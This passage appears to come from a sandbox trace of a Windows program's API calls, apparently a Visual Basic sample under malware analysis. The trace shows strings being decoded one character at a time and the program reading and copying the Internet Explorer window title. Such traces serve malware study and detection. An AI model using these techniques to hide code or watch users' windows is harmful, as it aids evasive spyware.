cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.185] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0176.185] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.186] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0176.186] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.191] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0176.191] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.192] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0176.192] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.193] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0176.193] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.193] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0176.194] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.194] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0176.195] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.195] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.196] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.196] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.197] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.197] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0176.197] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.198] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.198] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.199] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0176.199] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.200] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.200] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.200] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.201] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.201] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.202] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.349] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.350] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.350] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.350] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.351] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.351] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.352] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.352] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.353] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.353] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.353] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.354] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.354] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.354] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.355] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.355] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.356] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.356] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.357] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.357] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.363] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.363] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.364] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.364] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.364] GetForegroundWindow () returned 0x10162 [0176.364] GetLastError () returned 0x0 [0176.364] SysStringLen (param_1=" ") returned 0xff [0176.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.364] SysStringLen (param_1=" ") returned 0xff [0176.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.365] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.365] GetLastError () returned 0x0 [0176.365] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.365] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0176.366] SysStringLen (param_1="Blank Page - Windows Internet Explorer") returned 0x27 [0176.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blank Page - Windows Internet Explorer", cchWideChar=40, lpMultiByteStr=0x1168d8c, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blank Page - Windows Internet Explorer", lpUsedDefaultChar=0x0) returned 40 [0176.366] SetWindowTextA (hWnd=0x103c4, lpString="Blank Page - Windows Internet Explorer") returned 1 [0176.366] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0176.366] GetFocus () returned 0x0 [0176.366] lstrlenA (lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.366] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1168d8c) returned 0x1 [0176.367] IsWindow (hWnd=0x103c4) returned 1 [0176.367] IsWindow (hWnd=0x103c4) returned 1 [0176.367] IsWindow (hWnd=0x103c4) returned 1 [0176.367] IsWindow (hWnd=0x103c4) returned 1 [0176.368] GetFocus () returned 0x0 [0176.368] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0176.368] GetFocus () returned 0x0 [0176.368] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x27) returned 0x10ebcd0 [0176.368] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x27, lParam=0x10ebcd0) returned 0x26 [0176.368] GetFocus () returned 0x0 [0176.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0176.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x1168d8c, cchWideChar=39 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 39 [0176.369] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.369] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.370] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0176.370] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.371] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.371] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.372] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.372] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.372] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.373] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", 